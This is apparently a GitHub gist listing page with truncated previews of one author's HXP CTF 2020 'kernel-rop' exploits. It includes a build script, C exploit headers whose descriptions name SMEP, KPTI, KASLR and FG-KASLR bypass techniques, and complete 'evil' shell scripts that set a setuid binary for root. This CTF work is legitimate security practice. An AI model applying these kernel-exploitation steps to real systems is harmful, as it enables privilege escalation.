Skip to content

Instantly share code, notes, and snippets.

View brant-ruan's full-sized avatar
:octocat:
不要尖叫

Bonan Ruan brant-ruan

:octocat:
不要尖叫
View GitHub Profile
#!/bin/bash
# Compress initramfs with the included statically linked exploit
in=$1
out=$(echo $in | awk '{ print substr( $0, 1, length($0)-2 ) }')
gcc $in -static -o $out || exit 255
mv $out initramfs
pushd . && pushd initramfs
find . -print0 | cpio --null --format=newc -o 2>/dev/null | gzip -9 > ../initramfs.cpio.gz
popd
@brant-ruan
brant-ruan / leak_canary.c
Last active September 2, 2022 09:30
HXP CTF 2020 >> kernel-rop | partial exploit
#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char *VULN_DRV = "/dev/hackme";
@brant-ruan
brant-ruan / overwrite_return_address.c
Created September 2, 2022 09:44
HXP CTF 2020 >> kernel-rop | partial exploit
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *VULN_DRV = "/dev/hackme";
int64_t global_fd = 0;
uint64_t cookie = 0;
@brant-ruan
brant-ruan / exploit_bypass_fgkaslr_with_ksymtab_leak.c
Last active September 5, 2022 04:51
[exploit_bypass_fgkaslr_with_ksymtab_leak] HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with trampoline; bypass KASLR with kernel offset leak; bypass FG-KASLR with ksymtab leak
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
void spawn_shell();
void leak_commit_creds_from_ksymtab();
void leak_prepare_kernel_cred_from_ksymtab();
@brant-ruan
brant-ruan / exploit_bypass_kaslr_with_offset_leak.c
Last active September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with modprobe; bypass KASLR with kernel offset leak; no FG-KASLR
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
char *VULN_DRV = "/dev/hackme";
void spawn_shell();
@brant-ruan
brant-ruan / evil
Last active September 5, 2022 04:51
[exploit_bypass_fgkaslr_with_unaffected_gadgets] HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with coredump; bypass KASLR with kernel offset leak; bypass FG-KASLR with unaffected gadgets
#!/bin/sh
mv /evilsu /tmp/evilsu
chmod u+s /tmp/evilsu
chmod 777 /evilsu
@brant-ruan
brant-ruan / evil
Last active September 5, 2022 04:51
[exploit_bypass_kpti_with_modprobe] HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with modprobe; no KASLR
#!/bin/sh
mv /evilsu /tmp/evilsu
chmod u+s /tmp/evilsu
chmod 777 /evilsu
@brant-ruan
brant-ruan / exploit_bypass_smep.c
Last active September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | no KPTI; no KASLR
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *VULN_DRV = "/dev/hackme";
void spawn_shell();
int64_t global_fd = 0;
@brant-ruan
brant-ruan / exploit_bypass_kpti_with_signal_handler.c
Last active September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with SIGSEGV handler; no KASLR
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
struct sigaction sigact;
char *VULN_DRV = "/dev/hackme";
void spawn_shell();
@brant-ruan
brant-ruan / exploit_bypass_kpti_with_trampoline.c
Last active September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with KPTI trampoline; no KASLR
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
char *VULN_DRV = "/dev/hackme";
void spawn_shell();